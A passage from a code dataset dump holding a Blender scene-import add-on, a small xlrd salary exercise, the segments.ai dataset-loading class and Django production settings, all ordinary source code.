imagepath=imagepath.replace('//','\\\\')\n path=DIR+imagepath\n path=path.replace('\\\\\\\\','\\\\')\n \n if SYS=='Windows':\n path=path.replace('/','\\\\')\n else:\n path=path.replace('\\\\','/')\n path=path.replace('//','/').replace('//','/')\n\n\n \n #image = bpy.data.add_image(path)\n image = load_image(path, DIR)\n texture = bpy.data.textures.new(sname)\n texture.type = 'IMAGE' \n texture = texture.recast_type()\n texture.image = image\n\n\n\n for line in mtl:\n ##print( \"INFO :\" + line)\n\n line_split= line.split()\n line_lower= (line.lower().lstrip()).replace('\\t','')\n \n\n if line_lower.startswith('from'):\n l_from = (float(line_split[1])*SCL,float(line_split[2])*SCL,float(line_split[3])*SCL)\n \n elif line_lower.startswith('rot'):\n l_rot = (float(line_split[1]),float(line_split[2]),float(line_split[3]))\n elif line_lower.startswith('lensm'):\n l_lens = float(line_split[1])\n\n\n\n if scene.IMPORT_LIGHT:\n\n if line.startswith('newlight'):\n print(\" INFO: Making New Light\" )\n l_from=None\n l_type=None\n l_rot=None\n l_name= line_value(line.split())\n makeNew=True\n \n if makeNew and l_from and l_rot and l_type and l_name:\n \n if crob(l_name):\n if l_type == 'IES':\n l_type='SPOT'\n ies=True\n l=bpy.ops.object.lamp_add(type=l_type, view_align=False, location=l_from, rotation=(0,0,0)) \n ob = bpy.context.scene.objects.active\n lamp = ob.data\n ob.name=l_name\n lamp.name=l_name\n makeNew=False\n ob.rotation_euler[0]=l_rot[0] * pi / 180\n ob.rotation_euler[1]=l_rot[1] * pi / 180\n ob.rotation_euler[2]=l_rot[2] * pi / 180\n lamp.shadow_method='RAY_SHADOW'\n try:\n lamp.shadow_ray_samples=8\n except:pass\n \n try:\n if line_lower.startswith('type') :\n l_type = line_split[1]\n \n elif line_lower.startswith('power') :\n lamp.energy = float(line_split[1])\n \n elif line_lower.startswith('areax') :\n lamp.size = float(line_split[1])*SCL\n lamp.shadow_method='RAY_SHADOW'\n lamp.shadow_ray_samples_x=8\n lamp.distance=3\n \n elif line_lower.startswith('areay') :\n lamp.shape='RECTANGLE'\n 
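# RECTANGLE area lamps get a second dimension; like areax, size_y is scaled by the scene SCL factor\n 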
lamp.size_y = float(line_split[1])*SCL\n lamp.shadow_ray_samples_y=8\n \n \n elif line_lower.startswith('color') :\n lamp.color = (float(line_split[1]),float(line_split[2]),float(line_split[3]))\n \n elif line_lower.startswith('texture') :\n #YAFARAY IES\n lamp.ies_file=line_split[1]\n lamp.lamp_type='ies'\n pass \n \n \n elif line_lower.startswith('samples') :\n try: lamp.shadow_ray_samples = int(float(line_split[1]))\n except:() \n try: lamp.shadow_ray_samples_x=int(float(line_split[1]))\n except:()\n try: lamp.shadow_ray_samples_y=int(float(line_split[1]))\n except:()\n \n \n elif line_lower.startswith('texture') and makeNew:\n img_filepath= line_value(line.split())\n if img_filepath:\n \n load_light_image(lamp, img_filepath,\"Lamp_\"+stripExt(stripPath(img_filepath)))\n except:() \n\n if scene.IMPORT_CAMERA:\n if line.startswith('newcam'):\n #print(' INFO: Making New Cam')\n\n l_from=None\n l_type=None\n l_rot=None\n l_lens=None\n l_name= line_value(line.split())\n makeCamNew=True\n \n \n if makeCamNew and l_from and l_rot and l_name and l_lens:\n print(' INFO: Make Cam %s ' % l_name)\n if crob(l_name):\n \n bpy.ops.object.camera_add(view_align=False, enter_editmode=False, location=(0.0, 0.0, 0.0), rotation=(0.0, 0.0, 0.0))\n \n ob = bpy.context.scene.objects.active\n cam = ob.data\n ob.name=l_name\n cam.name=l_name\n ob.location=l_from\n ob.rotation_euler[0] = pi * l_rot[0]/180\n ob.rotation_euler[1] = pi * l_rot[1]/180\n ob.rotation_euler[2] = pi * l_rot[2]/180\n ob.data.clip_end = 5000\n ob.data.clip_start=0.0001\n makeCamNew=False \n cam.lens = l_lens\n print(' INFO: Make Cam %s DONE ' % l_name)\n else:\n print(' INFO: Cam %s FAIL (EXISTING)' % l_name)\n \n \n elif line_lower.startswith('lensm') and makeCamNew==False:\n l_lens = float(line_split[1])\n \n\n \n \n \n \n mtl.close()\n\t\n\t\n\n\ndef load_obj_mot(path):\n print(' INFO: Start Objects animation ') \n from math import pi \n SC = bpy.context.scene\n SCR = SC.render\n SCL = SC.SCL \n FrameRate = float(SCR.fps)\n objects=bpy.context.scene.objects\n for ObjMot in objects:\n filename=path+'Motion/'+( stripExt((ObjMot.name.split('~'))[0]) )+'.mot'\n \n\n \n\n \n \n if os.path.isfile(filename):\n File = open (filename, 'rU')\n CurChannel = -1\n ScaleFlag = 0\n LocX=None\n LocY=None \n LocZ=None\n RotX=None\n RotY=None\n RotZ=None\n ScaleX=None\n ScaleY=None\n ScaleZ=None\n SC.frame_current=1\n cf=0\n for Line in File:\n line=Line.split (' ')\n\n if len(line) > 1:\n ObjMot.keyframe_insert(\"location\")\n ObjMot.keyframe_insert(\"rotation_euler\")\n ObjMot.keyframe_insert(\"scale\") \n SC.frame_current=int(float(line[0]))\n ObjMot.location[0]=float(line[1]) * SCL\n ObjMot.location[1]=float(line[2]) * SCL\n ObjMot.location[2]=float(line[3]) * SCL\n \n\n rx=ObjMot.rotation_euler[0]\n ry=ObjMot.rotation_euler[1]\n rz=ObjMot.rotation_euler[2] \n #print('---------------------------')\n #print(' x=%s y=%s z=%s' % (rx,ry,rz))\n \n \n \n try: ObjMot.rotation_euler[0] = (pi * (float(line[4])) /180) \n except: ObjMot.rotation_euler[0] = 0\n try: ObjMot.rotation_euler[1] = (pi * float(line[5]) /180)\n except: ObjMot.rotation_euler[1] = 0\n try: ObjMot.rotation_euler[2] = (pi * float(line[6]) /180)\n except: ObjMot.rotation_euler[2] = 0\n \n ObjMot.scale[0]=float(line[7])\n ObjMot.scale[2]=float(line[8])\n ObjMot.scale[1]=float(line[9])\n ObjMot.keyframe_insert(\"location\")\n ObjMot.keyframe_insert(\"rotation_euler\")\n ObjMot.keyframe_insert(\"scale\")\n File.close()\n\n\n\n\ndef load_cam_mot(path):\n print(' INFO: Start Cam animation ') \n 
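# assumed .cam row layout (inferred from the parsing below): a 'cRio ' header line,\n # then one row per frame: frame locX locY locZ rotX rotY rotZ lens\n 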
from math import pi \n\n SC = bpy.context.scene\n SCR = SC.render\n SCL = SC.SCL\n FrameRate = float(SCR.fps)\n objects=bpy.context.scene.objects\n for ob in objects:\n filename=path+'Motion/'+ob.name+'.cam'\n if os.path.isfile(filename):\n \n Fc = open(filename, 'r');\n l = 1;\n readVerts = False;\n readCam = False;\n numFrames = 0;\n\n bpy.ops.anim.keyingset_button_add(all=True)\n bpy.ops.anim.driver_button_add(all=True)\n for curLine in Fc.readlines():\n if (l==1) and ('cRio ' not in curLine):\n file.close();\n break;\n if l > 1:\n lp = curLine.split()\n location = (float(eval(lp[1]) * SCL),float(eval(lp[2]) * SCL),float(eval(lp[3]) * SCL))\n SC.frame_current=(int(float(lp[0])))\n ob.location=location\n ob.rotation_euler[0] = pi * (float(lp[4]))/180\n ob.rotation_euler[1] = pi * (float(lp[5]))/180\n ob.rotation_euler[2] = pi * (float(lp[6]))/180\n ob.data.lens = float(lp[7])\n ob.keyframe_insert(\"location\")\n ob.keyframe_insert(\"rotation_euler\")\n ob.data.keyframe_insert('lens')\n\n \n l += 1;\n Fc.close\n \n try:\n bpy.ops.object.select_name(name=ob.name)\n bpy.ops.view3d.object_as_camera()\n\n except:\n pass \n\n\n\n\ndef load_lamp_mot(path):\n print(' INFO: Start Lamp animation ') \n from math import pi \n SC = bpy.context.scene\n SCR = SC.render\n SCL = SC.SCL\n FrameRate = float(SCR.fps)\n objects=bpy.context.scene.objects\n for ObjMot in objects:\n filename=path+'Motion/'+(ObjMot.name.split('~'))[0]+'.lmp'\n if os.path.isfile(filename):\n\n File = open (filename, 'rU')\n CurChannel = -1\n ScaleFlag = 0\n LocX=None\n LocY=None \n LocZ=None\n RotX=None\n RotY=None\n RotZ=None\n ScaleX=None\n ScaleY=None\n ScaleZ=None\n\n SC.frame_current=1\n\n cf=0\n for Line in File:\n line=Line.split (' ')\n\n if len(line) > 1:\n ObjMot.keyframe_insert(\"location\")\n ObjMot.keyframe_insert(\"rotation_euler\")\n ObjMot.keyframe_insert(\"scale\") \n SC.frame_current=int(float(line[0]))\n ObjMot.location[0]=float(line[1]) * SCL\n ObjMot.location[1]=float(line[2]) * SCL\n ObjMot.location[2]=float(line[3]) * SCL\n \n try: ObjMot.rotation_euler[0] = pi * float(line[4]) /180 \n except: ObjMot.rotation_euler[0] = 0\n try: ObjMot.rotation_euler[1] = pi * float(line[5]) /180 \n except: ObjMot.rotation_euler[1] = 0\n try: ObjMot.rotation_euler[2] = pi * float(line[6]) /180 \n except: ObjMot.rotation_euler[2] = 0\n \n ObjMot.scale[0]=float(line[7])\n ObjMot.scale[1]=float(line[8])\n ObjMot.scale[2]=float(line[9])\n ObjMot.keyframe_insert(\"location\")\n ObjMot.keyframe_insert(\"rotation_euler\")\n ObjMot.keyframe_insert(\"scale\")\n File.close()\n\nDEBUG= True\nDEBUG= False\n\nfrom bpy.props import *\nScene = bpy.types.Scene\nScene.SCL = FloatProperty(attr=\"SCL\",name=\"Clamp Scale\", description=\"Clamp the size to this maximum (Zero to Disable)\", min=0.000, max=1000.0, soft_min=0.001, soft_max=1000.0, default=1.00)\nScene.IMPORT_GEOMETRY = BoolProperty(attr=\"IMPORT_GEOMETRY\",default= True)\nScene.IMPORT_GEOMETRY_PIVOT = BoolProperty(attr=\"IMPORT_GEOMETRY_ANIMATION\",default= True)\nScene.IMPORT_GEOMETRY_ANIMATION = BoolProperty(attr=\"IMPORT_GEOMETRY_ANIMATION\",default= True)\nScene.IMPORT_CAMERA = BoolProperty(attr=\"IMPORT_CAMERA\",default= True)\nScene.IMPORT_LIGHT = BoolProperty(attr=\"IMPORT_LIGHT\",default= True)\nScene.IMPORT_MATERIAL= BoolProperty(attr=\"IMPORT_MATERIAL\",default= True)\nScene.IMPORT_CAMERA_ANIMATION = BoolProperty(attr=\"IMPORT_CAMERA_ANIMATION\",default= True)\nScene.IMPORT_LIGHT_ANIMATION = BoolProperty(attr=\"IMPORT_LIGTH_ANIMATION\",default= True)\n\n\nclass 
SCENE_PT_importScene(bpy.types.Panel):\n bl_label = \"Import Scene\"\n bl_space_type = \"PROPERTIES\"\n bl_region_type = \"WINDOW\"\n bl_context = \"scene\"\n \n def draw(self, context):\n layout = self.layout\n scene = context.scene\n row = layout.row()\n row = layout.row()\n row.prop(scene,\"IMPORT_MATERIAL\", text='Material + Texture', icon='MATERIAL_DATA')\n \n \n row = layout.row()\n row = row.split(percentage=0.7)\n row.prop(scene,\"IMPORT_GEOMETRY\", text='Geometry Dae', icon='OBJECT_DATA')\n row = row.split(percentage=0.01)\n row.label(text=' ') \n\n row.prop(scene,\"IMPORT_GEOMETRY_ANIMATION\", text='', icon='ANIM_DATA')\n\n row = layout.row()\n row = row.split(percentage=0.7)\n row.prop(scene,\"IMPORT_CAMERA\", text='Camera', icon='CAMERA_DATA')\n row = row.split(percentage=0.01)\n row.label(text=' ')\n row.prop(scene,\"IMPORT_CAMERA_ANIMATION\", text='', icon='ANIM_DATA')\n row = layout.row()\n row = row.split(percentage=0.7)\n row.prop(scene,\"IMPORT_LIGHT\", text='Light', icon='LAMP_DATA')\n row = row.split(percentage=0.01)\n row.label(text=' ')\n row.prop(scene,\"IMPORT_LIGHT_ANIMATION\", text='', icon='ANIM_DATA')\n\n row = layout.row()\n row = row.split(percentage=0.7)\n\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row.prop(scene,\"SCL\" , text=\"Scale\")\n row = layout.row()\n row = layout.row()\n row.operator(\"object.custom_path\" , text=\"Import Scene\")\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row.label(text='Scene interchange: 1.2 beta') \n row = layout.row()\n row.label(text='wavefront(.OBJ) support ')\n layout.label(text='3DS Max, Lightwave, Maya') \n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n row = layout.row()\n layout.label(text='Copyright (C) 11-set-2011 Silvio Falcinelli')\n row = layout.row()\n layout.label(text='GNU license')\n row = layout.row()\n row = layout.row()\n\nimport bpy\nfrom bpy.props import *\n\n\nScene.path= StringProperty(name=\"file path\",\n attr=\"path\", \n description=\"simple file path\",\n maxlen= 1024,\n default= \"\")\n\nclass OBJECT_OT_CustomPath(bpy.types.Operator):\n bl_idname = \"object.custom_path\"\n bl_label = \"Scene Path\"\n __doc__ = \"\"\n\n filepath = StringProperty(name=\"File Path\", description=\"getting file path\", maxlen= 1024, default= \"\")\n\n def execute(self, context):\n scene = context.scene\n scene.path = self.properties.filepath\n namefile=stripExt(self.properties.filepath)\n print(namefile)\n bpy.data.scenes['Scene'].frame_current = 1 \n bpy.context.scene.frame_set(1) \n \n namefile=namefile.replace('_FIXED','') # nel caso venga selezionato un file processato\n \n if scene.IMPORT_GEOMETRY:\n fixCollada(namefile+'.dae')\n bpy.ops.wm.collada_import(filepath=namefile+'_FIXED.dae') \n\n print('CLEAR COLLADA PARENT LINK')\n bpy.ops.object.select_all(action='SELECT')\n bpy.ops.object.parent_clear()\n \n \n \n ### fix name ob for wavefront(obj) import\n for ob in bpy.context.scene.objects:\n \n try: \n ob.name = stripExt(ob.data.name)\n except:\n try:\n ob.name = ob.data.name ## fix obj\n except: pass \n \n try: \n ob.name = stripExt(ob.name).replace('Mesh','') #fix collada\n \n except: pass\n \n \n if not ob.data:\n try:\n ### bpy.ops.object.select_name() in DelObj ### 2.6.2 problem\n \n DelObj(ob) # in blender 2.5.9 is OK\n except:\n\n ob.name=\"z_trash\" ## patch for 2.6.2\n \n\n\n \n bpy.context.scene.frame_set(1) \n \n for cM in 
bpy.data.materials:\n MatName='<'+cM.name\n cM.name=(MatName.replace('<_','')).replace('<','')\n \n scene.frame_current=1\n bpy.context.scene.frame_set(1) \n \n \n \n print('INFO general check') \n load_Scn(namefile+'.scn')\n \n \n\n if scene.IMPORT_MATERIAL:\n print('INFO start material upgrade') \n for context_material in bpy.data.materials:\n \n nameFileMtl='<'+context_material.name\n context_material.name=(nameFileMtl.replace('<_','')).replace('<','') ### collada fix name\n nameFileMtl=stripFile(namefile)+\"Materials/\"+context_material.name.split('.')[0]+\".mtl\"\n \n if os.path.isfile(nameFileMtl):\n print(context_material.name)\n create_materials(nameFileMtl ,context_material) \n \n \n \n #if scene.IMPORT_MATERIAL: create_materials(namefile) \n if scene.IMPORT_GEOMETRY_ANIMATION: load_obj_mot(stripFile(namefile)) #load_obj(namefile+'.obj', context)\n if scene.IMPORT_LIGHT_ANIMATION: load_lamp_mot(stripFile(namefile)) \n if scene.IMPORT_CAMERA_ANIMATION: load_cam_mot(stripFile(namefile)) \n print(' INFO: Scene Done ') \n return {'FINISHED'}\n def invoke(self, context, event):\n wm = context.window_manager\n wm.fileselect_add(self)\n context.scene.path = context.scene.path\n return {'RUNNING_MODAL'}\n\ndef menu_func_import(self, context):\n pass\n\ndef register():\n bpy.utils.register_module(__name__)\n bpy.types.INFO_MT_file_import.append(menu_func_import)\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n bpy.types.INFO_MT_file_import.remove(menu_func_import)\n\nif __name__ == \"__main__\":\n register()","sub_path":"tools/script/blender/scenedemo.py","file_name":"scenedemo.py","file_ext":"py","file_size_in_byte":37981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42623092","text":"import xlrd\nfrom numpy import median\nrb = xlrd.open_workbook('excel/salaries.xlsx')\nsheet = rb.sheet_by_index(0)\nvals = [sheet.row_values(rownum) for rownum in range(sheet.nrows)]\nmax = 0.0\nsum = 0.0\ncity = ''\nspec = ''\nspecialty = {}\n\nfor i in range(1, 9):\n if max < median(vals[i][1:]):\n max = median(vals[i][1:])\n city = str(vals[i][0])\n for j in range(1, 8):\n if specialty.get(vals[0][j]) != None:\n specialty[vals[0][j]] = specialty.get(vals[0][j]) + vals[i][j]\n else:\n specialty[vals[0][j]] = vals[i][j]\n\nmax = 0\nfor key, val in specialty.items():\n specialty[key] = val / 8\n if val > max:\n max = val\n spec = key\n\nprint(city, spec)\n\n\n\n","sub_path":"stepik_parsing/exercise/ex07.py","file_name":"ex07.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"568593939","text":"from __future__ import annotations\n\nimport json\nimport logging\nimport os\nfrom multiprocessing.pool import ThreadPool\nfrom typing import Any, Dict, List, Optional, Tuple, Union, cast\nfrom urllib.parse import urlparse\n\nimport numpy as np\nimport numpy.typing as npt\nimport requests\nfrom PIL import Image, UnidentifiedImageError\nfrom pydantic import parse_obj_as\nfrom segments.typing import LabelStatus, Release, SegmentsDatasetCategory\nfrom segments.utils import (\n handle_exif_rotation,\n load_image_from_url,\n load_label_bitmap_from_url,\n)\nfrom tqdm import tqdm\n\n#############\n# Variables #\n#############\nlogger = logging.getLogger(__name__)\n\n\nclass SegmentsDataset:\n \"\"\"A class that represents a Segments dataset.\n\n .. 
code-block:: python\n\n # pip install --upgrade segments-ai\n from segments import SegmentsClient, SegmentsDataset\n from segments.utils import export_dataset\n\n # Initialize a SegmentsDataset from the release file\n client = SegmentsClient('YOUR_API_KEY')\n release = client.get_release('jane/flowers', 'v1.0') # Alternatively: release = 'flowers-v1.0.json'\n dataset = SegmentsDataset(release, labelset='ground-truth', filter_by=['LABELED', 'REVIEWED'])\n\n # Export to COCO panoptic format\n export_format = 'coco-panoptic'\n export_dataset(dataset, export_format)\n\n Alternatively, you can use the initialized :class:`SegmentsDataset` to loop through the samples and labels, and visualize or process them in any way you please:\n\n .. code-block:: python\n\n import matplotlib.pyplot as plt\n from segments.utils import get_semantic_bitmap\n\n for sample in dataset:\n\n # Print the sample name and list of labeled objects\n print(sample['name'])\n print(sample['annotations'])\n\n # Show the image\n plt.imshow(sample['image'])\n plt.show()\n\n # Show the instance segmentation label\n plt.imshow(sample['segmentation_bitmap'])\n plt.show()\n\n # Show the semantic segmentation label\n semantic_bitmap = get_semantic_bitmap(sample['segmentation_bitmap'], sample['annotations'])\n plt.imshow(semantic_bitmap)\n plt.show()\n\n Args:\n release_file: Path to a release file, or a release class resulting from :meth:`.get_release`.\n labelset: The labelset that should be loaded. Defaults to ``ground-truth``.\n filter_by: A list of label statuses to filter by. Defaults to :obj:`None`.\n filter_by_metadata: A dict of metadata key:value pairs to filter by. Filters are ANDed together. Defaults to :obj:`None`.\n segments_dir: The directory where the data will be downloaded to for caching. Set to :obj:`None` to disable caching. Defaults to ``segments``.\n preload: Whether the data should be pre-downloaded when the dataset is initialized. Ignored if ``segments_dir`` is :obj:`None`. Defaults to :obj:`True`.\n s3_client: A boto3 S3 client, e.g. ``s3_client = boto3.client(\"s3\")``. Needs to be provided if your images are in a private S3 bucket. 
Defaults to :obj:`None`.\n Raises:\n :exc:`ValueError`: If the release task type is not one of: ``segmentation-bitmap``, ``segmentation-bitmap-highres``, ``image-vector-sequence``, ``bboxes``, ``vector``, ``pointcloud-cuboid``, ``pointcloud-cuboid-sequence``, ``pointcloud-segmentation``, ``pointcloud-segmentation-sequence``, ``text-named-entities``, or ``text-span-categorization``.\n :exc:`ValueError`: If there is no labelset with this name.\n \"\"\"\n\n # https://stackoverflow.com/questions/682504/what-is-a-clean-pythonic-way-to-have-multiple-constructors-in-python\n def __init__(\n self,\n release_file: Union[str, Release],\n labelset: str = \"ground-truth\",\n filter_by: Optional[Union[LabelStatus, List[LabelStatus]]] = None,\n filter_by_metadata: Optional[Dict[str, str]] = None,\n segments_dir: str = \"segments\",\n preload: bool = True,\n s3_client: Optional[Any] = None,\n ):\n self.labelset = labelset\n if isinstance(filter_by, list):\n filter_by = [f.upper() for f in filter_by]\n elif filter_by:\n filter_by = [filter_by.upper()]\n self.filter_by = filter_by\n # if self.filter_by:\n # self.filter_by = [s.lower() for s in self.filter_by]\n self.filter_by_metadata = filter_by_metadata\n self.segments_dir = segments_dir\n self.caching_enabled = segments_dir is not None\n self.preload = preload\n self.s3_client = s3_client\n\n # if urlparse(release_file).scheme in ('http', 'https'): # If it's a url\n if isinstance(release_file, str): # If it's a file path\n with open(release_file) as f:\n self.release = json.load(f)\n else: # If it's a release object\n release_file_url = release_file.attributes.url\n content = requests.get(cast(str, release_file_url)) # TODO Fix in backend.\n self.release = json.loads(content.content)\n self.release_file = release_file\n\n self.dataset_identifier = \"{}_{}\".format(\n self.release[\"dataset\"][\"owner\"], self.release[\"dataset\"][\"name\"]\n )\n\n self.image_dir = (\n None\n if segments_dir is None\n else os.path.join(\n segments_dir, self.dataset_identifier, self.release[\"name\"]\n )\n )\n\n # First some checks\n if self.labelset not in [\n labelset[\"name\"] for labelset in self.release[\"dataset\"][\"labelsets\"]\n ]:\n raise ValueError(f\"There is no labelset with name '{self.labelset}'.\")\n\n self.task_type = self.release[\"dataset\"][\"task_type\"]\n if self.task_type not in [\n \"segmentation-bitmap\",\n \"segmentation-bitmap-highres\",\n \"vector\",\n \"bboxes\",\n \"keypoints\",\n \"image-vector-sequence\",\n \"pointcloud-cuboid\",\n \"pointcloud-segmentation\",\n ]:\n raise ValueError(\n f\"You can only create a dataset for tasks of type 'segmentation-bitmap', 'segmentation-bitmap-highres', 'vector', 'bboxes', 'keypoints', 'image-vector-sequence', 'pointcloud-cuboid', 'pointcloud-segmentation' for now. 
Got {self.task_type}.\"\n )\n\n self.load_dataset()\n\n def load_dataset(self) -> None:\n print(\"Initializing dataset...\")\n\n # Setup cache\n if (\n self.caching_enabled\n and self.image_dir\n and not os.path.exists(self.image_dir)\n ):\n os.makedirs(self.image_dir)\n\n # Load and filter the samples\n samples = self.release[\"dataset\"][\"samples\"]\n if self.filter_by:\n filtered_samples = []\n for sample in samples:\n if sample[\"labels\"][self.labelset]:\n label_status = sample[\"labels\"][self.labelset][\"label_status\"]\n else:\n label_status = \"UNLABELED\"\n\n if self.filter_by and label_status in self.filter_by:\n filtered_samples.append(sample)\n samples = filtered_samples\n\n if self.filter_by_metadata:\n filtered_samples = []\n for sample in samples:\n # https://stackoverflow.com/a/41579450/1542912\n if self.filter_by_metadata.items() <= sample[\"metadata\"].items():\n filtered_samples.append(sample)\n samples = filtered_samples\n\n self.samples = samples\n\n # # Preload all samples (sequentially)\n # for i in tqdm(range(self.__len__())):\n # item = self.__getitem__(i)\n\n # To avoid memory overflow or \"Too many open files\" error when using tqdm in combination with multiprocessing.\n def _load_image(i: int) -> int:\n self.__getitem__(i)\n return i\n\n # Preload all samples (in parallel)\n # https://stackoverflow.com/questions/16181121/a-very-simple-multithreading-parallel-url-fetching-without-queue/27986480\n # https://stackoverflow.com/questions/3530955/retrieve-multiple-urls-at-once-in-parallel\n # https://github.com/tqdm/tqdm/issues/484#issuecomment-461998250\n num_samples = self.__len__()\n if (\n self.caching_enabled\n and self.preload\n and self.task_type not in [\"pointcloud-segmentation\", \"pointcloud-cuboid\"]\n ):\n print(\"Preloading all samples. 
This may take a while...\")\n with ThreadPool(16) as pool:\n # list(tqdm(pool.imap_unordered(self.__getitem__, range(num_samples)), total=num_samples))\n list(\n tqdm(\n pool.imap_unordered(_load_image, range(num_samples)),\n total=num_samples,\n colour=\"#FF9900\",\n )\n )\n\n print(f\"Initialized dataset with {num_samples} images.\")\n\n def _load_image_from_cache(\n self, sample: Dict[str, Any]\n ) -> Tuple[Optional[Image.Image], str]:\n sample_name = os.path.splitext(sample[\"name\"])[0]\n image_url = sample[\"attributes\"][\"image\"][\"url\"]\n image_url_parsed = urlparse(image_url)\n url_extension = os.path.splitext(image_url_parsed.path)[1]\n # image_filename_rel = '{}{}'.format(sample['uuid'], url_extension)\n image_filename_rel = f\"{sample_name}{url_extension}\"\n\n if image_url_parsed.scheme == \"s3\":\n image = None\n else:\n if self.caching_enabled:\n image_filename = os.path.join(self.image_dir, image_filename_rel)\n if not os.path.exists(image_filename):\n image = load_image_from_url(\n image_url, image_filename, self.s3_client\n )\n else:\n try:\n image = Image.open(image_filename)\n except UnidentifiedImageError:\n image = None\n logger.error(\n f\"Something went wrong loading image: {image_filename}\"\n )\n else:\n image = load_image_from_url(image_url, self.s3_client)\n\n image = handle_exif_rotation(image)\n\n return image, image_filename_rel\n\n def _load_segmentation_bitmap_from_cache(\n self, sample: Dict[str, Any], labelset: str\n ) -> Union[npt.NDArray[np.uint32], Image.Image]:\n sample_name = os.path.splitext(sample[\"name\"])[0]\n label = sample[\"labels\"][labelset]\n segmentation_bitmap_url = label[\"attributes\"][\"segmentation_bitmap\"][\"url\"]\n url_extension = os.path.splitext(urlparse(segmentation_bitmap_url).path)[1]\n\n if not segmentation_bitmap_url:\n return None\n\n if self.caching_enabled:\n # segmentation_bitmap_filename = os.path.join(self.image_dir, '{}{}'.format(label['uuid'], url_extension))\n segmentation_bitmap_filename = os.path.join(\n self.image_dir,\n f\"{sample_name}_label_{labelset}{url_extension}\",\n )\n if not os.path.exists(segmentation_bitmap_filename):\n return load_label_bitmap_from_url(\n segmentation_bitmap_url, segmentation_bitmap_filename\n )\n else:\n return Image.open(segmentation_bitmap_filename)\n else:\n return load_label_bitmap_from_url(segmentation_bitmap_url)\n\n @property\n def categories(self) -> List[SegmentsDatasetCategory]:\n return parse_obj_as(\n List[SegmentsDatasetCategory],\n self.release[\"dataset\"][\"task_attributes\"][\"categories\"],\n )\n # categories = {}\n # for category in self.release['dataset']['labelsets'][self.labelset]['attributes']['categories']:\n # categories[category['id']] = category['name']\n # return categories\n\n def __len__(self) -> int:\n return len(self.samples)\n\n def __getitem__(self, index: int) -> Dict[str, Any]:\n sample: Dict[str, Any] = self.samples[index]\n\n if self.task_type in [\n \"pointcloud-segmentation\",\n \"pointcloud-cuboid\",\n \"image-vector-sequence\",\n ]:\n return sample\n\n # Load the image\n image, image_filename = None, None\n try:\n image, image_filename = self._load_image_from_cache(sample)\n except (KeyError, TypeError):\n logger.error(\n f\"Something went wrong loading sample {sample['name']}: {sample}\"\n )\n\n item = {\n \"uuid\": sample[\"uuid\"],\n \"name\": sample[\"name\"],\n \"file_name\": image_filename,\n \"image\": image,\n \"metadata\": sample[\"metadata\"],\n }\n\n # Segmentation bitmap\n if (\n self.task_type == \"segmentation-bitmap\"\n 
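# highres bitmaps are loaded through the same segmentation-label branch as standard bitmaps\n 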
or self.task_type == \"segmentation-bitmap-highres\"\n ):\n # Load the label\n try:\n label = sample[\"labels\"][self.labelset]\n segmentation_bitmap = self._load_segmentation_bitmap_from_cache(\n sample, self.labelset\n )\n attributes = label[\"attributes\"]\n annotations = attributes[\"annotations\"]\n item.update(\n {\n \"segmentation_bitmap\": segmentation_bitmap,\n \"annotations\": annotations,\n \"attributes\": attributes,\n }\n )\n except (KeyError, TypeError):\n item.update(\n {\n \"segmentation_bitmap\": None,\n \"annotations\": None,\n \"attributes\": None,\n }\n )\n\n # Vector labels\n elif (\n self.task_type == \"vector\"\n or self.task_type == \"bboxes\"\n or self.task_type == \"keypoints\"\n ):\n try:\n label = sample[\"labels\"][self.labelset]\n attributes = label[\"attributes\"]\n annotations = attributes[\"annotations\"]\n item.update({\"annotations\": annotations, \"attributes\": attributes})\n except (KeyError, TypeError):\n item.update({\"annotations\": None, \"attributes\": None})\n\n else:\n raise ValueError(\"This task type is not yet supported.\")\n\n # # transform\n # if self.transform:\n # item = self.transform(item)\n\n return item\n","sub_path":"src/segments/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":14812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"246908027","text":"from os import environ\nfrom djangobase.settings.common import *\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\nSECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': environ.get(\"DATABASE_NAME\", \"\"),\n 'USER': environ.get(\"DATABASE_USER\", \"\"),\n 'PASSWORD': environ.get(\"DATABASE_PASSWORD\", \"\"),\n 'HOST': '127.0.0.1',\n 'PORT': '5432',\n }\n}\n\nINSTALLED_APPS += (\n 'raven.contrib.django.raven_compat',\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts\nALLOWED_HOSTS = [\n '.bjacobel.com'\n]\n\n########## CACHE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',\n 'LOCATION': '127.0.0.1:11211',\n }\n}\n########## END CACHE CONFIGURATION\n\n########## AMAZON CONFIGURATION\n\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\nSTATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\nAWS_STORAGE_BUCKET_NAME = \"djangobase\"\nAWS_ACCESS_KEY_ID = environ.get(\"AWS_ACCESS_KEY_ID\", \"\")\nAWS_SECRET_ACCESS_KEY = environ.get(\"AWS_SECRET_ACCESS_KEY\", \"\")\nAWS_PRELOAD_METADATA = True\nAWS_QUERYSTRING_EXPIRE = 63115200\nS3_URL = 'http://djangobase.s3.amazonaws.com/'\n\nSTATIC_URL = S3_URL\nMEDIA_URL = S3_URL\n\n########## END AMAZON\n\n### DJANGO-COMPRESSOR SETTINGS ###\n\nCOMPRESS_CSS_FILTERS = (\n \"compressor.filters.cssmin.CSSMinFilter\",\n)\n\nCOMPRESS_JS_FILTERS = (\n \"compressor.filters.jsmin.JSMinFilter\", # this is actually the default but :shrug:\n)\n\nCOMPRESS_STORAGE = STATICFILES_STORAGE\n\n### END 